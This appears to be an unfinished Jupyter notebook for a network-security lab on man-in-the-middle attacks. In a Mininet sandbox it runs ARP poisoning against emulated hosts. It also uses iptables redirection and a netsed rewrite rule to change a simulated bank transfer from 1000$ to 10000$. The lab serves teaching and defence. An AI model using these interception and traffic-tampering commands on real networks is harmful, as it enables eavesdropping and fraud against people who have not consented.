# Man In The Middle (MIM)

A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-middle attacks can be abbreviated in many ways, including MITM, MitM, MiM or MIM. [[1]](https://www.veracode.com/security/man-middle-attack)

The remainder of this lab is organized as follows: we provide a review of MIM in Section 1. Further, we present a thorough explanation about how we can intercept network flow and related subjects of the MIM attack in Section 2. In Sections 3, we present how attacker can modifying HTTP request (or any unencrypted packets) after network interception. In Section 4, Alice and Bob use Diffie–Hellman to exchange secret keys and Eve use this algorithm deficiency to break their secure communication. Finally, in Section 5 we will have funny example.

In each Section we will implement small sample to further explain each section.

## Table of Contents
1. [How does a man-in-the-middle attack work?](#1.-How-does-a-man-in-the-middle-attack-work%3F-%3Ca-href%3D%22https%3A%2F%2Fus.norton.com%2Finternetsecurity-wifi-what-is-a-man-in-the-middle-attack.html%22-rel%3D%22nofollow%22-target%3D%22_blank%22%3E%5B1%5D%3C%2Fa%3E)
2. [Intercept Network Flow](#2.-Intercept-Network-Flow)
3. [Modify HTTP requests](#3.-Modify-HTTP-requests)

## 1. How does a man-in-the-middle attack work? [[1]](https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html)

How does this play out? Let’s say you received an email that appeared to be from your bank, asking you to log in to your account to confirm your contact information. You click on a link in the email and are taken to what appears to be your bank’s website, where you log in and perform the requested task.

In such a scenario, the man in the middle (MITM) sent you the email, making it appear to be legitimate. (This attack also involves phishing, getting you to click on the email appearing to come from your bank.) He also created a website that looks just like your bank’s website, so you wouldn’t hesitate to enter your login credentials after clicking the link in the email. But when you do that, you’re not logging into your bank account, you’re handing over your credentials to the attacker.

### MITM attacks: Close to you or with malware

Man-in-the-middle attacks come in two forms, one that involves physical proximity to the intended target, and another that involves malicious software, or malware. This second form, like our fake bank example above, is also called a man-in-the-browser attack.

Cybercriminals typically execute a man-in-the-middle attack in two phases — interception and decryption.

With a traditional MITM attack, the cybercriminal needs to gain access to an unsecured or poorly secured Wi-Fi router. These types of connections are generally found in public areas with free Wi-Fi hotspots, and even in some people’s homes, if they haven’t protected their network. Attackers can scan the router looking for specific vulnerabilities such as a weak password.

Once attackers find a vulnerable router, they can deploy tools to intercept and read the victim’s transmitted data. The attacker can then also insert their tools between the victim’s computer and the websites the user visits to capture log in credentials, banking information, and other personal information.

A successful man-in-the-middle attack does not stop at interception. The victim’s encrypted data must then be unencrypted, so that the attacker can read and act upon it.

### What is a man-in-the-browser attack?

With a man-in-the-browser attack (MITB), an attacker needs a way to inject malicious software, or malware, into the victim’s computer or mobile device. One of the ways this can be achieved is by phishing.

Phishing is when a fraudster sends an email or text message to a user that appears to originate from trusted source, such as a bank, as in our original example. By clicking on a link or opening an attachment in the phishing message, the user can unwittingly load malware onto their device.

The malware then installs itself on the browser without the user’s knowledge. The malware records the data sent between the victim and specific targeted websites, such as financial institutions, and transmits it to the attacker.

## 2. Intercept Network Flow

In first step of **Man In The Middle attack**, Attacker (Eve) should intercepts victim (Bob) traffic through the attacker’s network before it reaches its intended destination. Attacker (Eve) may launch one of the following attacks to reach this goal:

**IP spoofing:** involves an attacker disguising himself as an application by altering packet headers in an IP address. As a result, users attempting to access a URL connected to the application are sent to the attacker’s website. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

**ARP spoofing:** also known as ARP Poisoning is the process of linking an attacker’s MAC address with the IP address of a legitimate user on a local area network using fake ARP messages. As a result, data sent by the user to the host IP address is instead transmitted to the attacker. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

**DNS spoofing:** also known as DNS cache poisoning, involves infiltrating a DNS server and altering a website’s address record. As a result, users attempting to access the site are sent by the altered DNS record to the attacker’s site. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

In this exercise we use ARP Poisoning techniq to intercept network flow from Bob to Alice.

### ARP Poisoning

ARP Poisoning is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a server on the network. Once the attacker’s MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP poisoning can enable malicious parties to intercept, modify or even stop data intransit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol. [[2](https://www.veracode.com/security/arp-spoofing)]

This scenario illustrated in below pictures. (These images created by [Creatly](https://creatly.com))

|     ‌                                          |                             |
|:----------------------------------------------:|:---------------------------:|
|![](./img/1-initial-setup.png)                  |![](./img/2-send-ARP.png)    |
|![](./img/3-poisoned-tables.png)                |![](./img/4-packets-flow.png)|

#### Exercise One, ARP Poisoning

**Note:** $\color{blue}{\text{(T)}}$ at the end of steps means you need output of that step to complete your lab report, don't forget to take screen shot.

1. Run below script and wait untill mininet console show up.
2. Run $\color{#1E90FF}{\text{`bob arp -a`}}$ and $\color{#1E90FF}{\text{`alice arp -a`}}$ in mininet console to check arp tables entry in Bob and Alice hosts. (Nothing will show up if it was empty)
3. Ping Alice host from Bob to fill arp table. $\color{#03C03C}{\text{Hint: run}}$ $\color{#177245}{\text{`bob ping alice -c 3`}}$ 
4. Check arp tables again. $\color{blue}{\text{(T)}}$ $\color{#03C03C}{\text{Hint: Repeat step two.}}$
5. Run $\color{#1E90FF}{\text{`eve python arp-poison.py &`}}$ to poison Alice and Bob.
6. Check arp tables again. $\color{blue}{\text{(T)}}$ $\color{#03C03C}{\text{Hint: Repeat step two.}}$
7. Open Scapy module in seperate window, and run **Exercise One, ARP Poison** cell to capture ping packets.
8. Ping Alice host from Bob. $\color{#03C03C}{\text{Hint: Repeat step three.}}$
9. Check scapy output and save it for your lab report. $\color{blue}{\text{(T)}}$

#### Lab report

* Explain ARP Poisoning attack justify your answer with Scapy output.
* Attach arp tables to your lab report.
* Why in the Scapy output we saw two **Echo Request** and then two **Echo Reply** not one **Echo Request** with one **Echo Reply** ?

In [None]:
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("alice",mac='00:00:00:00:00:01',ip='10.0.0.1')
topo.addHost("eve",mac='00:00:00:00:00:02',ip='10.0.0.2')
topo.addHost("bob",mac='00:00:00:00:00:03',ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("alice", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

CLI(net)  # Bring up the mininet CLI

net.stop()

mininet>  alice arp -a
mininet>  bob arp -a
mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=2.28 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.280 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=64 time=0.068 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=64 time=0.138 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=64 time=0.056 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4073ms
rtt min/avg/max/mdev = 0.056/0.566/2.288/0.864 ms


mininet>  alice arp -a


? (10.0.0.3) at 00:00:00:00:00:03 [ether] on alice-eth0


mininet>  bob arp -a


? (10.0.0.1) at 00:00:00:00:00:01 [ether] on bob-eth0


mininet>  eve python arp-poison.py &


[1] 2158


mininet>  alice arp -a


? (10.0.0.3) at 00:00:00:00:00:02 [ether] on alice-eth0
? (10.0.0.2) at 00:00:00:00:00:02 [ether] on alice-eth0


mininet>  bob arp -a


? (10.0.0.2) at 00:00:00:00:00:02 [ether] on bob-eth0
? (10.0.0.1) at 00:00:00:00:00:02 [ether] on bob-eth0


mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=5.93 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.578 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.096 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.078 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.071 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4040ms
rtt min/avg/max/mdev = 0.071/1.352/5.938/2.301 ms


mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=0.542 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.081 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.084 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.080 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.098 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4037ms
rtt min/avg/max/mdev = 0.080/0.177/0.542/0.182 ms


mininet>  eve ls


[*] Starting script: arp_poison.py
[*] Enabling IP forwarding
sysctl: cannot stat /proc/sys/net/inet/ip/forwarding: No such file or directory
0
[*] Gateway IP address: set(['10.0.0.1'])
[*] Target IP address: set(['10.0.0.3'])
[*] Gateway MAC address: set(['00:00:00:00:00:01'])
[*] Target MAC address: set(['00:00:00:00:00:03'])
[*] Started ARP poison attack [CTRL-C to stop]
 [*] Starting network capture. Packet Count: set([1000]). Filter: set(['icmp or ip host 10.0.0.3'])
RUNME.ipynb    devile.jpg	img	      web-server.ipynb
Scapy.ipynb    get_image.ipynb	response.jpg  web-server.py
arp-poison.py  get_image.py	response.txt


mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=3.57 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.568 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.194 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.079 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.083 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4047ms
rtt min/avg/max/mdev = 0.079/0.900/3.577/1.350 ms


mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=0.718 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.102 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.108 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.098 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.081 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4030ms
rtt min/avg/max/mdev = 0.081/0.221/0.718/0.248 ms


mininet>  bob ping alice -c 5


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=3.68 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.597 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.067 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.085 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.139 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 0.067/0.915/3.688/1.400 ms


mininet>  bob ping alice -c 3


PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=4.64 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.441 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.087 ms

--- 10.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.087/1.723/4.641/2.068 ms



#### Colors: (todo remove this section)
$\color{#00B7EB}{\text{`eve python arp-poison.py &`}}$

$\color{#1E90FF}{\text{`eve python arp-poison.py &`}}$

$\color{blue}{\text{`eve python arp-poison.py &`}}$

$\color{#03C03C}{\text{`eve python arp-poison.py &`}}$

$\color{#177245}{\text{`eve python arp-poison.py &`}}$

## 3. Modify HTTP requests

https://serverfault.com/questions/318960/easy-way-to-edit-the-traffic-coming-from-a-tcp-host-linux
https://blog.wains.be/2016/2016-03-17-netsed-stream-editor/

1. bob python set_password.py bank 1234
2. bob python transfer.py bank 1000$ 1234
3. eve python arp-poison.py &

In [None]:
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("bank",mac='00:00:00:00:00:01',ip='10.0.0.1')
topo.addHost("eve",mac='00:00:00:00:00:02',ip='10.0.0.2')
topo.addHost("bob",mac='00:00:00:00:00:03',ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("bank", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

# Run bank web server
net.get("bank").cmd("python web-server.py &")

CLI(net)  # Bring up the mininet CLI

net.stop()

mininet>  bob python set_password.py bank 1234


Password was set.


mininet>  eve python arp-poison.py &


[1] 11531


mininet>  eve iptables -t nat -D PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101


[*] Starting script: arp_poison.py
[*] Enabling IP forwarding
sysctl: cannot stat /proc/sys/net/inet/ip/forwarding: No such file or directory
0
[*] Gateway IP address: set(['10.0.0.1'])
[*] Target IP address: set(['10.0.0.3'])
[*] Gateway MAC address: set(['00:00:00:00:00:01'])
[*] Target MAC address: set(['00:00:00:00:00:03'])
[*] Started ARP poison attack [CTRL-C to stop]
 [*] Starting network capture. Packet Count: set([10]). Filter: set(['icmp or ip host 10.0.0.3'])
iptables: No chain/target/match by that name.


mininet>  eve netsed tcp 10101 10.0.0.1 80 s/00$/000$


netsed 1.2 by Julien VdG <julien@silicone.homelinux.org>
      based on 0.01c from Michal Zalewski <lcamtuf@ids.pl>
[*] Parsing rule s/00$/000$...
[+] Loaded 1 rule...
[+] Using fixed forwarding to 10.0.0.1,80.
[+] Listening on port 10101/tcp.


mininet>  eve iptables -t nat -D PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101


iptables: No chain/target/match by that name.


mininet>  eve iptables -t nat -A PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101
mininet>  eve netsed tcp 10101 10.0.0.1 80 s/00$/000$ &
mininet>  bob python transfer.py bank 1000$ 1234


Transfered 10000$ successfully.


In [None]:
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("bank",mac='00:00:00:00:00:01',ip='10.0.0.1')
topo.addHost("eve",mac='00:00:00:00:00:02',ip='10.0.0.2')
topo.addHost("bob",mac='00:00:00:00:00:03',ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("bank", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

# Run bank web server
net.get("bank").cmd("python web-server.py &")
net.get("bob").cmd("python set_password.py 10.0.0.1 1234")
net.get("eve").cmd("python arp-poison.py &")
net.get("eve").cmd("iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 0")
net.get("eve").cmd("python test.py > out.txt &")

CLI(net)  # Bring up the mininet CLI

net.stop()

mininet>  bob python transfer.py bank 1000$ 1234


Transfered 1000$ successfully.


mininet>  bob python transfer.py bank 1000$ 1234


Transfered 1000$ successfully.
